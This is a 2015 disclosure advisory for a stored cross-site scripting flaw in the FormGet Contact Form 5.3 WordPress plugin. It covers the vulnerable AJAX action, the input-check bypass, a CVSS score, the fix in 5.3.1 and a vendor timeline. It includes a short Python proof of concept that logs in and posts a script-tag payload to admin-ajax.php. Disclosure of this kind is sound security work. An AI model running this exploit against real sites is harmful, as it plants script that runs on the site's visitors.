FormGet Contact Form 5.3, Persistent XSS
The AJAX action ‘request_response’, defined in formget-contact-form/index.php line 278 is available to any logged in user. The parameter ‘value’ is accepted as valid, so long as the string ‘sideBar’ is found at a position other than 0 (i.e. prefix the payload with a space). The ‘page_id[]’ parameter can be provided in order to specify which pages to display the desired HTML/JS on.
Homepage
https://wordpress.org/plugins/formget-contact-form/
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 5.3.1.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php'%target
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"request_response",
"value":" sideBar<script>alert(1)</script>",
"page_id[]":range(0,100)
}
r = s.post(url, data=payload)Timeline
- 2015-02-27: Discovered
- 2015-02-27: Vendor notified
- 2015-02-27: Vendor responded
- 2015-02-28: Version 5.3.1 released – issue still present
- 2015-02-28: Issue resolved in Git repo – enquired about bumping version number
- 2015-02-28: Re-checked version 5.3.1 – issue resolved, but version number not bumped.
- 2015-03-07: Advisory released